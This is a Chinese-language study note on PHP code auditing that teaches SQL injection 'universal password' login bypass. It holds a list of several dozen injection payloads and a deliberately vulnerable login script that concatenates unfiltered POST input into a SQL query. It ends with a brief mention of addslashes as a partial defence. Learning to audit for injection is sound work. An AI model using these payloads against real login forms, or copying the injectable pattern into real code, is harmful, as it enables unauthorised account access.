0x00 写在前面
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前辈视频学习记录。
本章开始,正式进入代码审计的世界。让me看看曾经让我遥不可及的代码审计能不能慢慢啃下来。
同时,文章还是需要一丢丢些基础的,包括但不限于html、php、mysql和渗透知识。
0x01 代码审计-万能密码
sql三种注释
单行注释
select user_name from users where user_id;--这时注释
select user_name from users where user_id;-- 这时注释(要空格)
多行注释
select user_name from users where user_id;/*这时注释*/
同时,注意注入和sql语法的异同,参考链接如下:
SQL注入中,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master_51CTO博客_sql注入注释
常用的测试万能密码,参考链接如下:
真正测试的语句并没有这么多,而且现在存在万能密码的站点已经很少见
仅作摘录
' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1
个人已搭建好环境进行测试,测试时结合代码、抓包和手动调试。篇幅有限,这里仅演示代码。这里使用了phpstorm工具,具体下载及破解可以靠自己解决。
checkUser.php
<?php
/**
* Created by 流沙
*/
//用户登录
require "./lib/init.php";
header("Content-type:text/html;charset=utf-8");
if(empty($_POST))
{
//header('Location: register.php');
echo "登录信息为空";
header("Refresh:3;url=login.php");
}else{
if(isset($_POST["user_name"]) && isset($_POST["user_pass"])){ //接收数据,是否设置了user_name、user_pass
$usename = trim($_POST["user_name"]); //trim用来去除字符串首尾的空格,此处假如用-- 来注释后有问题的
$password = trim($_POST["user_pass"]); //对用户的输入也并没有做任何过滤
//接收username,user_pass
$password = md5($password); //接收到password进行md5加密,所以如果密码进行aa' or 1#是没有用的,因为作了md5加密
$sql = "select * from users where user_name='$usename' and user_pass='$password'";
/*这里用var_dump输出sql语句,用来调试
var_dump($sql);
exit();
*/
$selectSQL = new MySql(); //实例化对象
$user_data = $selectSQL->getRow($sql); //跟进getrow,看getrow代码逻辑
/*------------------------------------------------------------------------*/
if($user_data!="")
{
session_start();
$_SESSION["user"] = $user_data["user_name"];
header("Location: user.php");
}else{
echo "用户名或者密码错误!";
header("Refresh:3;url=login.php");
}
}else{
echo "登录信息不完整";
header("Refresh:3;url=login.php");
}
}
为更好理解代码,跟进到getrow,看getrow代码逻辑,发现getrow仅用来返回sql语句
跟进到link,link仅作为数据库连接作用
因万能密码也是较为简单,基本审计思路已经完成。
0x02 防御手段
常用手段是对于用户输入的字符串进行严格过滤,这里代码仅使用了addslashes()用于过滤,其实该函数也是存在绕过风险的,但我们的目的是学习,馒头一口一口吃。
夜已深,今日先到此为止吧。如有错误,欢迎指正。